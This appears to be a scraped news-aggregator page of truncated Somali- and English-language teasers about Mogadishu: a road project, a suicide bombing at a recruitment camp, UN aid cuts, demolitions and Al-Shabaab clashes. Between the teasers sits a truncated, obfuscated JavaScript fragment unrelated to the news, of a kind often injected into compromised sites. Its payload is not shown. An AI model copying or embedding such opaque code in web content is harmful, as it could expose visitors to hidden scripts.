Ra’iisul Wasaare Ku-xigeenka oo Dhagax-dhigay Dhismaha Waddada Nasiib Buundo ee Muqdisho
MUQDISHO, Soomaaliya – Ra’iisul Wasaare ku-xigeenka labaad ee Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Jibriil Cabdirashiid Xaaji Cabdi, ayaa maanta si rasmi ah u dhagax-dhigay dhismaha waddada Nasiib Buundo, oo dhex marta degmooyinka Warta-Nabadda, Boondheere ilaa Shibis.
Munaasabadda dhagax-dhigga waxaa sidoo kale ka qeyb galay Guddoomiyaha gobolka Banaadir, ahna Duqa Muqdisho, Mudane Maxamed Axmed Amiir.
Jibriil ayaa sheegay in dhismaha waddooyinka ay tahay...
Somali Government Confirms Suicide Attack at Mogadishu Recruitment Camp
MOGADISHU, May 18 – A suicide bomber targeted a military recruitment centre in Somalia’s capital, Mogadishu, on Saturday, the government said, as unconfirmed reports indicated significant casualties among army hopefuls.
The blast occurred around 9:20 am outside the Damaanyo military camp, where large crowds of young men had gathered to enlist in the Somali National Army. The Ministry of Information...
Dowladda oo war kasoo saartay qaraxii ka dhacay Damaanyo, Muqdisho
MUQDISHO, Soomaaliya - Wasaaradda Warfaafinta Xukuumadda Soomaaliya ayaa soo saartay qoraal ay uga hadashay qaraxii saakay ka dhacay magaaladda Muqdisho.
Qaraxa ayaa geystay khasaaro dhimasho oo ka badan 11 qof, iyadoo wararka qaar ay sheegayaan in illaa 20 qof ay ku dhinteen, tiro intaasi ka badana ay ku dhaawacmeen.
Qof isku soo xiray walxaha qarxa ayaa weeraray dhalinyaro loo qorayay inay...
Qaramada Midoobay oo Hoos u Dhigaysa taageeradda Soomaaliya
NEW YORK - Qaramada Midoobay ayaa jimcihii shaacisay in ay hoos u dhigi doonto yoolalka caawinta bani’aadamnimo ee Yemen iyo Soomaaliya, kadib hoos u dhac weyn oo ka yimid deeqaha maaliyadeed ee ka imanaya dalalka xubnaha ka ah Qaramada Midoobay. Hay'adda ayaa sheegtay in go'aankan uu halis gelinayo nolol-magaaleed milyan iyo milyan oo qof oo adduunka ku nool.
Bishii Janaayo,...
Howlgal Bur Burin ah oo ka Socda Wadada Xiriirisa Ex-Kontarool Afgooye iyo Muqdisho
MUQDISHO, Soomaaliya - Wararka naga soo gaaraya wadada xiriirisa Ex-Kontarool Afgooye iyo Muqdisho ayaa sheegaya in laamigan dheer uu ka socdo howlgal bur burin ah oo lagu bur burinayo guryaha iyo dukaamada ku yaalla wadadaas.
Howlgalkan ayaa si gaar ah looga fulinayaa aagga dhulkii hore ee daawada loo yaqaan.
Mid ka mid ah dadka shacab ka ah, oo goob-jooge ka ahaa...
UN scales back aid goals in Somalia and Yemen
UNITED NATIONS, United States: The United Nations announced Friday it is scaling back its humanitarian aid goals in Yemen and Somalia in the latest fallout from a drastic drop in funding from member states.
It said the cuts are putting millions of lives at risk around the world.
In January the UN launched an appeal for $2.4 billion to help 10.5...
Deadly Bombing Hits Military Recruitment Center in Mogadishu
MOGADISHU, Somalia – A large explosion, believed to be a suicide bombing, has struck the capital city of Mogadishu at a time when the overall security situation had been showing signs of improvement.
Reports indicate that the blast targeted a military recruitment center in the Dhamanyo area, where new soldiers were being enlisted.
Preliminary information suggests that several people may have...
DEG DEG: Qarax ka dhacay magaaladda Muqdisho
MUQDISHO, Soomaaliya - Qarax wayn oo loo malaynayo ismiidaamin ayaa ka dhacay magaaladda Muqdisho, ee Caasimadda dalka Soomaaliya xili amniga soo hagaagayay.
Waxaa lagu soo waramayaa in qaraxa lala eegtay goob askar lagu qorayay, oo ku taalla Damaanyo, iyadoo wararka soo baxaya ay sheegayaan inay dhowr qof ku geeriyootay.
Goordhaw filo Fahfaahinta warkan iyo muuqaallada.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const...
Clashes in Nuurdugle, Middle Shabelle as Somali Forces Repel Al-Shabaab Attack
Nuurdugle, Middle Shabelle – A fierce battle erupted overnight in the Nuurdugle area of the Middle Shabelle region, as Al-Shabaab militants launched a heavy assault on the town.
The heavy clash saw intense fighting between the insurgents and Somali National Army (SNA) forces, who were supported by local militia fighters from the area.
While the exact toll of casualties remains unclear,...
Dagaal Xoogan oo ka Dhacay Deegaanka Nuurdugle ee Gobolka Shabeellaha Dhexe
JOWHAR, Soomaaliya - Faafaahin ayaa kasoo baxaysa dagaal xooggan oo ka dhacay deegaanka Nuurdugle ee gobolka Shabeellaha Dhexe saacadahii lasoo dhaafay.
Al-Shabaab ayaa xalay weerar xooggan ku qaaday deegaankaasi, waxaana halkaasi ka dhacay dagaal qaraar oo ay lagaleen ciidamada xoogga dalka oo garab ka helaya macaawislayda deegaanka.
Dagaalka ayaa sababay qasaare kala duwan oo soo gaaray labada dhinac, hase yeeshee tirada...











